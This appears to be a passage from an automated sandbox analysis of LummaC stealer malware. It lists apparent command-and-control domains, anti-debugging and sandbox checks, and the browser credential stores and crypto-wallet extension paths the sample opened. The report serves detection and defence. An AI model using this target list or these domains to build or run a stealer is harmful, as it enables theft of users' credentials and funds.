                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.0000000006142000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 0WO49yZcDA.exe, 0WO49yZcDA.exe, 00000000.00000003.2360552891.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001948000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2514052437.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412704361.0000000001985000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2360552891.0000000001985000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503713182.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2514052437.0000000001985000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412704361.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503713182.0000000001985000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.0000000006142000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513179164.000000000114C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: SICE
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: rapeflowwj.lat
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crosshuaht.lat
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sustainskelet.lat
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: aspecteirs.lat
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: energyaffai.lat
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacebudi.lat
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: discokeyus.lat
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: grannyejh.lat
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sweepyribs.lat
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513179164.000000000114C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: iuProgram Manager
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: 0WO49yZcDA.exe, 00000000.00000002.2514052437.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462590100.0000000001979000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503713182.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001977000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503586892.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: 0WO49yZcDA.exe PID: 1732, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412277604.00000000019F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets32
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412277604.00000000019F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412242953.000000000612C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx LibertyNA
                Source: 0WO49yZcDA.exe, 00000000.00000002.2514052437.0000000001996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412277604.00000000019F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: 0WO49yZcDA.exeString found in binary or memory: ExodusWeb3
                Source: 0WO49yZcDA.exe, 00000000.00000002.2514052437.0000000001996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412704361.0000000001985000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
